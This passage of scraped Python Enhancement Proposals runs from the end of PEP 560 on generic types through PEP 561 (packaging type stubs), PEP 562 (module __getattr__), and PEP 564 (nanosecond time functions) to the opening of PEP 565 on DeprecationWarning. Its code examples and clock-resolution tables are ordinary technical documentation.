resolved_bases = resolve_bases(bases) # This step is added
meta, ns, kwds = prepare_class(name, resolved_bases, kwds)
if exec_body is not None:
exec_body(ns)
ns['__orig_bases__'] = bases # This step is added
return meta(name, resolved_bases, ns, **kwds)
Using __class_getitem__ in C extensions
As mentioned above, __class_getitem__ is automatically a class method
if defined in Python code. To define this method in a C extension, one
should use flags METH_O|METH_CLASS. For example, a simple way to make
an extension class generic is to use a method that simply returns the
original class objects, thus fully erasing the type information at runtime,
and deferring all check to static type checkers only:
typedef struct {
PyObject_HEAD
/* ... your code ... */
} SimpleGeneric;
static PyObject *
simple_class_getitem(PyObject *type, PyObject *item)
{
Py_INCREF(type);
return type;
}
static PyMethodDef simple_generic_methods[] = {
{"__class_getitem__", simple_class_getitem, METH_O|METH_CLASS, NULL},
/* ... other methods ... */
};
PyTypeObject SimpleGeneric_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"SimpleGeneric",
sizeof(SimpleGeneric),
0,
.tp_flags = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE,
.tp_methods = simple_generic_methods,
};
Such class can be used as a normal generic in Python type annotations
(a corresponding stub file should be provided for static type checkers,
see PEP 484 for details):
from simple_extension import SimpleGeneric
from typing import TypeVar
T = TypeVar('T')
Alias = SimpleGeneric[str, T]
class SubClass(SimpleGeneric[T, int]):
...
data: Alias[int] # Works at runtime
more_data: SubClass[str] # Also works at runtime
Backwards compatibility and impact on users who don’t use typing
This proposal may break code that currently uses the names
__class_getitem__ and __mro_entries__. (But the language
reference explicitly reserves all undocumented dunder names, and
allows “breakage without warning”; see [6].)
This proposal will support almost complete backwards compatibility with
the current public generic types API; moreover the typing module is still
provisional. The only two exceptions are that currently
issubclass(List[int], List) returns True, while with this proposal it will
raise TypeError, and repr() of unsubscripted user-defined generics
cannot be tweaked and will coincide with repr() of normal (non-generic)
classes.
With the reference implementation I measured negligible performance effects
(under 1% on a micro-benchmark) for regular (non-generic) classes. At the same
time performance of generics is significantly improved:
importlib.reload(typing) is up to 7x faster
Creation of user defined generic classes is up to 4x faster (on a
micro-benchmark with an empty body)
Instantiation of generic classes is up to 5x faster (on a micro-benchmark
with an empty __init__)
Other operations with generic types and instances (like method lookup and
isinstance() checks) are improved by around 10-20%
The only aspect that gets slower with the current proof of concept
implementation is the subscripted generics cache look-up. However it was
already very efficient, so this aspect gives negligible overall impact.
References
[1]
Discussion following Mark Shannon’s presentation at Language Summit
(https://github.com/python/typing/issues/432)
[2]
Pull Request to implement shared generic ABC caches (merged)
(https://github.com/python/typing/pull/383)
[3]
An old bug with setting/accessing attributes on generic types
(https://github.com/python/typing/issues/392)
[4]
The reference implementation
(https://github.com/ilevkivskyi/cpython/pull/2/files,
https://github.com/ilevkivskyi/cpython/tree/new-typing)
[5]
Original proposal
(https://github.com/python/typing/issues/468)
[6]
Reserved classes of identifiers
(https://docs.python.org/3/reference/lexical_analysis.html#reserved-classes-of-identifiers)
Copyright
This document has been placed in the public domain.
| Final | PEP 560 – Core support for typing module and generic types | Standards Track | Initially PEP 484 was designed in such way that it would not introduce
any changes to the core CPython interpreter. Now type hints and
the typing module are extensively used by the community, e.g. PEP 526
and PEP 557 extend the usage of type hints, and the backport of typing
on PyPI has 1M downloads/month. Therefore, this restriction can be removed.
It is proposed to add two special methods __class_getitem__ and
__mro_entries__ to the core CPython for better support of
generic types. |
PEP 561 – Distributing and Packaging Type Information
Author:
Ethan Smith <ethan at ethanhs.me>
Status:
Final
Type:
Standards Track
Topic:
Packaging, Typing
Created:
09-Sep-2017
Python-Version:
3.7
Post-History:
10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018
Table of Contents
Abstract
Rationale
Definition of Terms
Specification
Packaging Type Information
Stub-only Packages
Type Checker Module Resolution Order
Partial Stub Packages
Implementation
Acknowledgements
Version History
References
Copyright
Abstract
PEP 484 introduced type hinting to Python, with goals of making typing
gradual and easy to adopt. Currently, typing information must be distributed
manually. This PEP provides a standardized means to leverage existing tooling
to package and distribute type information with minimal work and an ordering
for type checkers to resolve modules and collect this information for type
checking.
Rationale
Currently, package authors wish to distribute code that has inline type
information. Additionally, maintainers would like to distribute stub files
to keep Python 2 compatibility while using newer annotation syntax. However,
there is no standard method to distribute packages with type information.
Also, if one wished to ship stub files privately the only method available
would be via setting MYPYPATH or the equivalent to manually point to
stubs. If the package can be released publicly, it can be added to
typeshed [1]. However, this does not scale and becomes a burden on the
maintainers of typeshed. In addition, it ties bug fixes in stubs to releases
of the tool using typeshed.
PEP 484 has a brief section on distributing typing information. In this
section
the PEP recommends using shared/typehints/pythonX.Y/ for
shipping stub files. However, manually adding a path to stub files for each
third party library does not scale. The simplest approach people have taken
is to add site-packages to their MYPYPATH, but this causes type
checkers to fail on packages that are highly dynamic (e.g. sqlalchemy
and Django).
Definition of Terms
The definition of “MAY”, “MUST”, and “SHOULD”, and “SHOULD NOT” are
to be interpreted as described in RFC 2119.
“inline” - the types are part of the runtime code using PEP 526 and
PEP 3107 syntax (the filename ends in .py).
“stubs” - files containing only type information, empty of runtime code
(the filename ends in .pyi).
“Distributions” are the packaged files which are used to publish and distribute
a release. (PEP 426)
“Module” a file containing Python runtime code or stubbed type information.
“Package” a directory or directories that namespace Python modules.
(Note the distinction between packages and distributions. While most
distributions are named after the one package they install, some
distributions install multiple packages.)
Specification
There are several motivations and methods of supporting typing in a package.
This PEP recognizes three types of packages that users of typing wish to
create:
The package maintainer would like to add type information inline.
The package maintainer would like to add type information via stubs.
A third party or package maintainer would like to share stub files for
a package, but the maintainer does not want to include them in the source
of the package.
This PEP aims to support all three scenarios and make them simple to add to
packaging and deployment.
The two major parts of this specification are the packaging specifications
and the resolution order for resolving module type information. The type
checking spec is meant to replace the shared/typehints/pythonX.Y/
spec of PEP 484.
New third party stub libraries SHOULD distribute stubs via the third party
packaging methods proposed in this PEP in place of being added to typeshed.
Typeshed will remain in use, but if maintainers are found, third party stubs
in typeshed MAY be split into their own package.
Packaging Type Information
In order to make packaging and distributing type information as simple and
easy as possible, packaging and distribution is done through existing
frameworks.
Package maintainers who wish to support type checking of their code MUST add
a marker file named py.typed to their package supporting typing. This marker applies
recursively: if a top-level package includes it, all its sub-packages MUST support
type checking as well. To have this file installed with the package,
maintainers can use existing packaging options such as package_data in
distutils, shown below.
Distutils option example:
setup(
...,
package_data = {
'foopkg': ['py.typed'],
},
...,
)
For namespace packages (see PEP 420), the py.typed file should be in the
submodules of the namespace, to avoid conflicts and for clarity.
This PEP does not support distributing typing information as part of
module-only distributions or single-file modules within namespace packages.
The single-file module should be refactored into a package
and indicate that the package supports typing as described
above.
Stub-only Packages
For package maintainers wishing to ship stub files containing all of their
type information, it is preferred that the *.pyi stubs are alongside the
corresponding *.py files. However, the stubs can also be put in a separate
package and distributed separately. Third parties can also find this method
useful if they wish to distribute stub files. The name of the stub package
MUST follow the scheme foopkg-stubs for type stubs for the package named
foopkg. Note that for stub-only packages adding a py.typed marker is not
needed since the name *-stubs is enough to indicate it is a source of typing
information.
Third parties seeking to distribute stub files are encouraged to contact the
maintainer of the package about distribution alongside the package. If the
maintainer does not wish to maintain or package stub files or type information
inline, then a third party stub-only package can be created.
In addition, stub-only distributions SHOULD indicate which version(s)
of the runtime package are supported by indicating the runtime distribution’s
version(s) through normal dependency data. For example, the
stub package flyingcircus-stubs can indicate the versions of the
runtime flyingcircus distribution it supports through install_requires
in distutils-based tools, or the equivalent in other packaging tools. Note that
in pip 9.0, if you update flyingcircus-stubs, it will update
flyingcircus. In pip 9.0, you can use the
--upgrade-strategy=only-if-needed flag. In pip 10.0 this is the default
behavior.
For namespace packages (see PEP 420), stub-only packages should
use the -stubs suffix on only the root namespace package.
All stub-only namespace packages should omit __init__.pyi files. py.typed
marker files are not necessary for stub-only packages, but similarly
to packages with inline types, if used, they should be in submodules of the namespace to
avoid conflicts and for clarity.
For example, if the pentagon and hexagon are separate distributions
installing within the namespace package shapes.polygons
The corresponding types-only distributions should produce packages
laid out as follows:
shapes-stubs
└── polygons
└── pentagon
└── __init__.pyi
shapes-stubs
└── polygons
└── hexagon
└── __init__.pyi
Type Checker Module Resolution Order
The following is the order in which type checkers supporting this PEP SHOULD
resolve modules containing type information:
Stubs or Python source manually put in the beginning of the path. Type
checkers SHOULD provide this to allow the user complete control of which
stubs to use, and to patch broken stubs/inline types from packages.
In mypy the $MYPYPATH environment variable can be used for this.
User code - the files the type checker is running on.
Stub packages - these packages SHOULD supersede any installed inline
package. They can be found at foopkg-stubs for package foopkg.
Packages with a py.typed marker file - if there is nothing overriding
the installed package, and it opts into type checking, the types
bundled with the package SHOULD be used (be they in .pyi type
stub files or inline in .py files).
Typeshed (if used) - Provides the stdlib types and several third party
libraries.
If typecheckers identify a stub-only namespace package without the desired module
in step 3, they should continue to step 4/5. Typecheckers should identify namespace packages
by the absence of __init__.pyi. This allows different subpackages to
independently opt for inline vs stub-only.
Type checkers that check a different Python version than the version they run
on MUST find the type information in the site-packages/dist-packages
of that Python version. This can be queried e.g.
pythonX.Y -c 'import site; print(site.getsitepackages())'. It is also recommended
that the type checker allow for the user to point to a particular Python
binary, in case it is not in the path.
Partial Stub Packages
Many stub packages will only have part of the type interface for libraries
completed, especially initially. For the benefit of type checking and code
editors, packages can be “partial”. This means modules not found in the stub
package SHOULD be searched for in parts four and five of the module resolution
order above, namely inline packages and typeshed.
Type checkers should merge the stub package and runtime package or typeshed
directories. This can be thought of as the functional equivalent of copying the
stub package into the same directory as the corresponding runtime package or
typeshed folder and type checking the combined directory structure. Thus type
checkers MUST maintain the normal resolution order of checking *.pyi before
*.py files.
If a stub package distribution is partial it MUST include partial\n in a
py.typed file. For stub-packages distributing within a namespace
package (see PEP 420), the py.typed file should be in the
submodules of the namespace.
Type checkers should treat namespace packages within stub-packages as
incomplete since multiple distributions may populate them.
Regular packages within namespace packages in stub-package distributions
are considered complete unless a py.typed with partial\n is included.
Implementation
The proposed scheme of indicating support for typing is completely backwards
compatible, and requires no modification to package tooling. A sample package
with inline types is available [typed_package], as well as a [stub_package]. A
sample package checker [pkg_checker] which reads the metadata of installed
packages and reports on their status as either not typed, inline typed, or a
stub package.
The mypy type checker has an implementation of PEP 561 searching which can be
read about in the mypy docs [4].
[numpy-stubs] is an example of a real stub-only package for the numpy
distribution.
Acknowledgements
This PEP would not have been possible without the ideas, feedback, and support
of Ivan Levkivskyi, Jelle Zijlstra, Alyssa Coghlan, Daniel F Moisset, Andrey
Vlasovskikh, Nathaniel Smith, and Guido van Rossum.
Version History
2023-01-13
Clarify that the 4th step of the Module Resolution Order applies
to any package with a py.typed marker file (and not just
inline packages).
2021-09-20
Clarify expectations and typechecker behavior for stub-only namespace packages
Clarify handling of single-file modules within namespace packages.
2018-07-09
Add links to sample stub-only packages
2018-06-19
Partial stub packages can look at typeshed as well as runtime packages
2018-05-15
Add partial stub package spec.
2018-04-09
Add reference to mypy implementation
Clarify stub package priority.
2018-02-02
Change stub-only package suffix to be -stubs not _stubs.
Note that py.typed is not needed for stub-only packages.
Add note about pip and upgrading stub packages.
2017-11-12
Rewritten to use existing tooling only
No need to indicate kind of type information in metadata
Name of marker file changed from .typeinfo to py.typed
2017-11-10
Specification re-written to use package metadata instead of distribution
metadata.
Removed stub-only packages and merged into third party packages spec.
Removed suggestion for typecheckers to consider checking runtime versions
Implementations updated to reflect PEP changes.
2017-10-26
Added implementation references.
Added acknowledgements and version history.
2017-10-06
Rewritten to use .distinfo/METADATA over a distutils specific command.
Clarify versioning of third party stub packages.
2017-09-11
Added information about current solutions and typeshed.
Clarify rationale.
References
[1]
Typeshed (https://github.com/python/typeshed)
[4]
Example implementation in a type checker
(https://mypy.readthedocs.io/en/latest/installed_packages.html)
[stub_package]
A stub-only package
(https://github.com/ethanhs/stub-package)
[typed_package]
Sample typed package
(https://github.com/ethanhs/sample-typed-package)
[numpy-stubs]
Stubs for numpy
(https://github.com/numpy/numpy-stubs)
[pkg_checker]
Sample package checker
(https://github.com/ethanhs/check_typedpkg)
Copyright
This document has been placed in the public domain.
| Final | PEP 561 – Distributing and Packaging Type Information | Standards Track | PEP 484 introduced type hinting to Python, with goals of making typing
gradual and easy to adopt. Currently, typing information must be distributed
manually. This PEP provides a standardized means to leverage existing tooling
to package and distribute type information with minimal work and an ordering
for type checkers to resolve modules and collect this information for type
checking. |
PEP 562 – Module __getattr__ and __dir__
Author:
Ivan Levkivskyi <levkivskyi at gmail.com>
Status:
Final
Type:
Standards Track
Created:
09-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Specification
Backwards compatibility and impact on performance
Discussion
References
Copyright
Abstract
It is proposed to support __getattr__ and __dir__ function defined
on modules to provide basic customization of module attribute access.
Rationale
It is sometimes convenient to customize or otherwise have control over
access to module attributes. A typical example is managing deprecation
warnings. Typical workarounds are assigning __class__ of a module object
to a custom subclass of types.ModuleType or replacing the sys.modules
item with a custom wrapper instance. It would be convenient to simplify this
procedure by recognizing __getattr__ defined directly in a module that
would act like a normal __getattr__ method, except that it will be defined
on module instances. For example:
# lib.py
from warnings import warn
deprecated_names = ["old_function", ...]
def _deprecated_old_function(arg, other):
...
def __getattr__(name):
if name in deprecated_names:
warn(f"{name} is deprecated", DeprecationWarning)
return globals()[f"_deprecated_{name}"]
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
# main.py
from lib import old_function # Works, but emits the warning
Another widespread use case for __getattr__ would be lazy submodule
imports. Consider a simple example:
# lib/__init__.py
import importlib
__all__ = ['submod', ...]
def __getattr__(name):
if name in __all__:
return importlib.import_module("." + name, __name__)
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
# lib/submod.py
print("Submodule loaded")
class HeavyClass:
...
# main.py
import lib
lib.submod.HeavyClass # prints "Submodule loaded"
There is a related proposal PEP 549 that proposes to support instance
properties for a similar functionality. The difference is this PEP proposes
a faster and simpler mechanism, but provides more basic customization.
An additional motivation for this proposal is that PEP 484 already defines
the use of module __getattr__ for this purpose in Python stub files,
see PEP 484.
In addition, to allow modifying result of a dir() call on a module
to show deprecated and other dynamically generated attributes, it is
proposed to support module level __dir__ function. For example:
# lib.py
deprecated_names = ["old_function", ...]
__all__ = ["new_function_one", "new_function_two", ...]
def new_function_one(arg, other):
...
def new_function_two(arg, other):
...
def __dir__():
return sorted(__all__ + deprecated_names)
# main.py
import lib
dir(lib) # prints ["new_function_one", "new_function_two", "old_function", ...]
Specification
The __getattr__ function at the module level should accept one argument
which is the name of an attribute and return the computed value or raise
an AttributeError:
def __getattr__(name: str) -> Any: ...
If an attribute is not found on a module object through the normal lookup
(i.e. object.__getattribute__), then __getattr__ is searched in
the module __dict__ before raising an AttributeError. If found, it is
called with the attribute name and the result is returned. Looking up a name
as a module global will bypass module __getattr__. This is intentional,
otherwise calling __getattr__ for builtins will significantly harm
performance.
The __dir__ function should accept no arguments, and return
a list of strings that represents the names accessible on module:
def __dir__() -> List[str]: ...
If present, this function overrides the standard dir() search on
a module.
The reference implementation for this PEP can be found in [2].
Backwards compatibility and impact on performance
This PEP may break code that uses module level (global) names __getattr__
and __dir__. (But the language reference explicitly reserves all
undocumented dunder names, and allows “breakage without warning”; see [3].)
The performance implications of this PEP are minimal, since __getattr__
is called only for missing attributes.
Some tools that perform module attributes discovery might not expect
__getattr__. This problem is not new however, since it is already possible
to replace a module with a module subclass with overridden __getattr__ and
__dir__, but with this PEP such problems can occur more often.
Discussion
Note that the use of module __getattr__ requires care to keep the referred
objects pickleable. For example, the __name__ attribute of a function
should correspond to the name with which it is accessible via
__getattr__:
def keep_pickleable(func):
func.__name__ = func.__name__.replace('_deprecated_', '')
func.__qualname__ = func.__qualname__.replace('_deprecated_', '')
return func
@keep_pickleable
def _deprecated_old_function(arg, other):
...
One should be also careful to avoid recursion as one would do with
a class level __getattr__.
To use a module global with triggering __getattr__ (for example if one
wants to use a lazy loaded submodule) one can access it as:
sys.modules[__name__].some_global
or as:
from . import some_global
Note that the latter sets the module attribute, thus __getattr__ will be
called only once.
References
[2]
The reference implementation
(https://github.com/ilevkivskyi/cpython/pull/3/files)
[3]
Reserved classes of identifiers
(https://docs.python.org/3/reference/lexical_analysis.html#reserved-classes-of-identifiers)
Copyright
This document has been placed in the public domain.
| Final | PEP 562 – Module __getattr__ and __dir__ | Standards Track | It is proposed to support __getattr__ and __dir__ function defined
on modules to provide basic customization of module attribute access. |
PEP 564 – Add new time functions with nanosecond resolution
Author:
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
16-Oct-2017
Python-Version:
3.7
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Float type limited to 104 days
Previous rejected PEP
Issues caused by precision loss
Example 1: measure time delta in long-running process
Example 2: compare times with different resolution
CPython enhancements of the last 5 years
Existing Python APIs using nanoseconds as int
Changes
New functions
Unchanged functions
Alternatives and discussion
Sub-nanosecond resolution
Modifying time.time() result type
Different types
Different API
A new module
Annex: Clocks Resolution in Python
Script
Linux
Windows
Analysis
Links
Copyright
Abstract
Add six new “nanosecond” variants of existing functions to the time
module: clock_gettime_ns(), clock_settime_ns(),
monotonic_ns(), perf_counter_ns(), process_time_ns() and
time_ns(). While similar to the existing functions without the
_ns suffix, they provide nanosecond resolution: they return a number of
nanoseconds as a Python int.
The time.time_ns() resolution is 3 times better than the time.time()
resolution on Linux and Windows.
Rationale
Float type limited to 104 days
The clocks resolution of desktop and laptop computers is getting closer
to nanosecond resolution. More and more clocks have a frequency in MHz,
up to GHz for the CPU TSC clock.
The Python time.time() function returns the current time as a
floating-point number which is usually a 64-bit binary floating-point
number (in the IEEE 754 format).
The problem is that the float type starts to lose nanoseconds after 104
days. Converting from nanoseconds (int) to seconds (float) and
then back to nanoseconds (int) to check if conversions lose
precision:
# no precision loss
>>> x = 2 ** 52 + 1; int(float(x * 1e-9) * 1e9) - x
0
# precision loss! (1 nanosecond)
>>> x = 2 ** 53 + 1; int(float(x * 1e-9) * 1e9) - x
-1
>>> print(datetime.timedelta(seconds=2 ** 53 / 1e9))
104 days, 5:59:59.254741
time.time() returns seconds elapsed since the UNIX epoch: January
1st, 1970. This function hasn’t had nanosecond precision since May 1970
(47 years ago):
>>> import datetime
>>> unix_epoch = datetime.datetime(1970, 1, 1)
>>> print(unix_epoch + datetime.timedelta(seconds=2**53 / 1e9))
1970-04-15 05:59:59.254741
Previous rejected PEP
Five years ago, the PEP 410 proposed a large and complex change in all
Python functions returning time to support nanosecond resolution using
the decimal.Decimal type.
The PEP was rejected for different reasons:
The idea of adding a new optional parameter to change the result type
was rejected. It’s an uncommon (and bad?) programming practice in
Python.
It was not clear if hardware clocks really had a resolution of 1
nanosecond, or if that made sense at the Python level.
The decimal.Decimal type is uncommon in Python and so requires
to adapt code to handle it.
Issues caused by precision loss
Example 1: measure time delta in long-running process
A server is running for longer than 104 days. A clock is read before and
after running a function to measure its performance to detect
performance issues at runtime. Such benchmark only loses precision
because of the float type used by clocks, not because of the clock
resolution.
On Python microbenchmarks, it is common to see function calls taking
less than 100 ns. A difference of a few nanoseconds might become
significant.
Example 2: compare times with different resolution
Two programs “A” and “B” are running on the same system and use the system
clock. The program A reads the system clock with nanosecond resolution
and writes a timestamp with nanosecond resolution. The program B reads
the timestamp with nanosecond resolution, but compares it to the system
clock read with a worse resolution. To simplify the example, let’s say
that B reads the clock with second resolution. If that case, there is a
window of 1 second while the program B can see the timestamp written by A
as “in the future”.
Nowadays, more and more databases and filesystems support storing times
with nanosecond resolution.
Note
This issue was already fixed for file modification time by adding the
st_mtime_ns field to the os.stat() result, and by accepting
nanoseconds in os.utime(). This PEP proposes to generalize the
fix.
CPython enhancements of the last 5 years
Since the PEP 410 was rejected:
The os.stat_result structure got 3 new fields for timestamps as
nanoseconds (Python int): st_atime_ns, st_ctime_ns
and st_mtime_ns.
The PEP 418 was accepted, Python 3.3 got 3 new clocks:
time.monotonic(), time.perf_counter() and
time.process_time().
The CPython private “pytime” C API handling time now uses a new
_PyTime_t type: simple 64-bit signed integer (C int64_t).
The _PyTime_t unit is an implementation detail and not part of the
API. The unit is currently 1 nanosecond.
Existing Python APIs using nanoseconds as int
The os.stat_result structure has 3 fields for timestamps as
nanoseconds (int): st_atime_ns, st_ctime_ns and
st_mtime_ns.
The ns parameter of the os.utime() function accepts a
(atime_ns: int, mtime_ns: int) tuple: nanoseconds.
Changes
New functions
This PEP adds six new functions to the time module:
time.clock_gettime_ns(clock_id)
time.clock_settime_ns(clock_id, time: int)
time.monotonic_ns()
time.perf_counter_ns()
time.process_time_ns()
time.time_ns()
These functions are similar to the version without the _ns suffix,
but return a number of nanoseconds as a Python int.
For example, time.monotonic_ns() == int(time.monotonic() * 1e9) if
monotonic() value is small enough to not lose precision.
These functions are needed because they may return “large” timestamps,
like time.time() which uses the UNIX epoch as reference, and so their
float-returning variants are likely to lose precision at the nanosecond
resolution.
Unchanged functions
Since the time.clock() function was deprecated in Python 3.3, no
time.clock_ns() is added.
Python has other time-returning functions. No nanosecond variant is
proposed for these other functions, either because their internal
resolution is greater or equal to 1 us, or because their maximum value
is small enough to not lose precision. For example, the maximum value of
time.clock_getres() should be 1 second.
Examples of unchanged functions:
os module: sched_rr_get_interval(), times(), wait3()
and wait4()
resource module: ru_utime and ru_stime fields of
getrusage()
signal module: getitimer(), setitimer()
time module: clock_getres()
See also the Annex: Clocks Resolution in Python.
A new nanosecond-returning flavor of these functions may be added later
if an operating system exposes new functions providing better resolution.
Alternatives and discussion
Sub-nanosecond resolution
time.time_ns() API is not theoretically future-proof: if clock
resolutions continue to increase below the nanosecond level, new Python
functions may be needed.
In practice, the 1 nanosecond resolution is currently enough for all
structures returned by all common operating systems functions.
Hardware clocks with a resolution better than 1 nanosecond already
exist. For example, the frequency of a CPU TSC clock is the CPU base
frequency: the resolution is around 0.3 ns for a CPU running at 3
GHz. Users who have access to such hardware and really need
sub-nanosecond resolution can however extend Python for their needs.
Such a rare use case doesn’t justify to design the Python standard library
to support sub-nanosecond resolution.
For the CPython implementation, nanosecond resolution is convenient: the
standard and well supported int64_t type can be used to store a
nanosecond-precise timestamp. It supports a timespan of -292 years
to +292 years. Using the UNIX epoch as reference, it therefore supports
representing times since year 1677 to year 2262:
>>> 1970 - 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
1677.728976954687
>>> 1970 + 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
2262.271023045313
Modifying time.time() result type
It was proposed to modify time.time() to return a different number
type with better precision.
The PEP 410 proposed to return decimal.Decimal which already exists and
supports arbitrary precision, but it was rejected. Apart from
decimal.Decimal, no portable real number type with better precision
is currently available in Python.
Changing the built-in Python float type is out of the scope of this
PEP.
Moreover, changing existing functions to return a new type introduces a
risk of breaking the backward compatibility even if the new type is
designed carefully.
Different types
Many ideas of new types were proposed to support larger or arbitrary
precision: fractions, structures or 2-tuple using integers,
fixed-point number, etc.
See also the PEP 410 for a previous long discussion on other types.
Adding a new type requires more effort to support it, than reusing
the existing int type. The standard library, third party code and
applications would have to be modified to support it.
The Python int type is well known, well supported, easy to
manipulate, and supports all arithmetic operations such as
dt = t2 - t1.
Moreover, taking/returning an integer number of nanoseconds is not a
new concept in Python, as witnessed by os.stat_result and
os.utime(ns=(atime_ns, mtime_ns)).
Note
If the Python float type becomes larger (e.g. decimal128 or
float128), the time.time() precision will increase as well.
Different API
The time.time(ns=False) API was proposed to avoid adding new
functions. It’s an uncommon (and bad?) programming practice in Python to
change the result type depending on a parameter.
Different options were proposed to allow the user to choose the time
resolution. If each Python module uses a different resolution, it can
become difficult to handle different resolutions, instead of just
seconds (time.time() returning float) and nanoseconds
(time.time_ns() returning int). Moreover, as written above,
there is no need for resolution better than 1 nanosecond in practice in
the Python standard library.
A new module
It was proposed to add a new time_ns module containing the following
functions:
time_ns.clock_gettime(clock_id)
time_ns.clock_settime(clock_id, time: int)
time_ns.monotonic()
time_ns.perf_counter()
time_ns.process_time()
time_ns.time()
The first question is whether the time_ns module should expose exactly
the same API (constants, functions, etc.) as the time module. It can be
painful to maintain two flavors of the time module. How are users use
supposed to make a choice between these two modules?
If tomorrow, other nanosecond variants are needed in the os module,
will we have to add a new os_ns module as well? There are functions
related to time in many modules: time, os, signal,
resource, select, etc.
Another idea is to add a time.ns submodule or a nested-namespace to
get the time.ns.time() syntax, but it suffers from the same issues.
Annex: Clocks Resolution in Python
This annex contains the resolution of clocks as measured in Python, and
not the resolution announced by the operating system or the resolution of
the internal structure used by the operating system.
Script
Example of script to measure the smallest difference between two
time.time() and time.time_ns() reads ignoring differences of zero:
import math
import time
LOOPS = 10 ** 6
print("time.time_ns(): %s" % time.time_ns())
print("time.time(): %s" % time.time())
min_dt = [abs(time.time_ns() - time.time_ns())
for _ in range(LOOPS)]
min_dt = min(filter(bool, min_dt))
print("min time_ns() delta: %s ns" % min_dt)
min_dt = [abs(time.time() - time.time())
for _ in range(LOOPS)]
min_dt = min(filter(bool, min_dt))
print("min time() delta: %s ns" % math.ceil(min_dt * 1e9))
Linux
Clocks resolution measured in Python on Fedora 26 (kernel 4.12):
Function
Resolution
clock()
1 us
monotonic()
81 ns
monotonic_ns()
84 ns
perf_counter()
82 ns
perf_counter_ns()
84 ns
process_time()
2 ns
process_time_ns()
1 ns
resource.getrusage()
1 us
time()
239 ns
time_ns()
84 ns
times().elapsed
10 ms
times().user
10 ms
Notes on resolutions:
clock() frequency is CLOCKS_PER_SECOND which is 1,000,000 Hz
(1 MHz): resolution of 1 us.
times() frequency is os.sysconf("SC_CLK_TCK") (or the HZ
constant) which is equal to 100 Hz: resolution of 10 ms.
resource.getrusage(), os.wait3() and os.wait4() use the
ru_usage structure. The type of the ru_usage.ru_utime and
ru_usage.ru_stime fields is the timeval structure which has a
resolution of 1 us.
Windows
Clocks resolution measured in Python on Windows 8.1:
Function
Resolution
monotonic()
15 ms
monotonic_ns()
15 ms
perf_counter()
100 ns
perf_counter_ns()
100 ns
process_time()
15.6 ms
process_time_ns()
15.6 ms
time()
894.1 us
time_ns()
318 us
The frequency of perf_counter() and perf_counter_ns() comes from
QueryPerformanceFrequency(). The frequency is usually 10 MHz: resolution of
100 ns. In old Windows versions, the frequency was sometimes 3,579,545 Hz (3.6
MHz): resolution of 279 ns.
Analysis
The resolution of time.time_ns() is much better than
time.time(): 84 ns (2.8x better) vs 239 ns on Linux and 318 us
(2.8x better) vs 894 us on Windows. The time.time() resolution will
only become larger (worse) as years pass since every day adds
86,400,000,000,000 nanoseconds to the system clock, which increases the
precision loss.
The difference between time.perf_counter(), time.monotonic(),
time.process_time() and their respective nanosecond variants is
not visible in this quick script since the script runs for less than 1
minute, and the uptime of the computer used to run the script was
smaller than 1 week. A significant difference may be seen if uptime
reaches 104 days or more.
resource.getrusage() and times() have a resolution greater or
equal to 1 microsecond, and so don’t need a variant with nanosecond
resolution.
Note
Internally, Python starts monotonic() and perf_counter()
clocks at zero on some platforms which indirectly reduce the
precision loss.
Links
bpo-31784: Implementation of the PEP 564
Copyright
This document has been placed in the public domain.
| Final | PEP 564 – Add new time functions with nanosecond resolution | Standards Track | Add six new “nanosecond” variants of existing functions to the time
module: clock_gettime_ns(), clock_settime_ns(),
monotonic_ns(), perf_counter_ns(), process_time_ns() and
time_ns(). While similar to the existing functions without the
_ns suffix, they provide nanosecond resolution: they return a number of
nanoseconds as a Python int. |
PEP 565 – Show DeprecationWarning in __main__
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Final
Type:
Standards Track
Created:
12-Nov-2017
Python-Version:
3.7
Post-History:
12-Nov-2017, 25-Nov-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Specification
New default warnings filter entry
Additional use case for FutureWarning
Recommended filter settings for test runners
Recommended filter settings for interactive shells
Other documentation updates
Reference Implementation
Motivation
Limitations on PEP Scope
References
Copyright
Abstract
In Python 2.7 and Python 3.2, the default warning filters were updated to hide
DeprecationWarning by default, such that deprecation warnings in development
tools that were themselves written in Python (e.g. linters, static analysers,
test runners, code generators), as well as any other applications that merely
happened to be written in Python, wouldn’t be visible to their users unless
those users explicitly opted in to seeing them.
However, this change has had the unfortunate side effect of making
DeprecationWarning markedly less effective at its primary intended purpose:
providing advance notice of breaking changes in APIs (whether in CPython, the
standard library, or in third party libraries) to users of those APIs.
To improve this situation, this PEP proposes a single adjustment to the
default warnings filter: displaying deprecation warnings attributed to the main
module by default.
This change will mean that code entered at the interactive prompt and code in
single file scripts will revert to reporting these warnings by default, while
they will continue to be silenced by default for packaged code distributed as
part of an importable module.
The PEP also proposes a number of small adjustments to the reference
interpreter and standard library documentation to help make the warnings
subsystem more approachable for new Python developers.
As part of the documentation updates, it will be made clearer that the
unittest test runner displays all warnings by default when executing
test cases, and that other test runners are advised to follow that example.
Specification
New default warnings filter entry
The current set of default warnings filters consists of:
ignore::DeprecationWarning
ignore::PendingDeprecationWarning
ignore::ImportWarning
ignore::BytesWarning
ignore::ResourceWarning
The default unittest test runner then uses warnings.catch_warnings()
warnings.simplefilter('default') to override the default filters while
running test cases.
The change proposed in this PEP is to update the default warning filter list
to be:
default::DeprecationWarning:__main__
ignore::DeprecationWarning
ignore::PendingDeprecationWarning
ignore::ImportWarning
ignore::BytesWarning
ignore::ResourceWarning
This means that in cases where the nominal location of the warning (as
determined by the stacklevel parameter to warnings.warn) is in the
__main__ module, the first occurrence of each DeprecationWarning will once
again be reported.
This change will lead to DeprecationWarning being displayed by default for:
code executed directly at the interactive prompt
code executed directly as part of a single-file script
While continuing to be hidden by default for:
code imported from another module in a zipapp archive’s __main__.py
file
code imported from another module in an executable package’s __main__
submodule
code imported from an executable script wrapper generated at installation time
based on a console_scripts or gui_scripts entry point definition
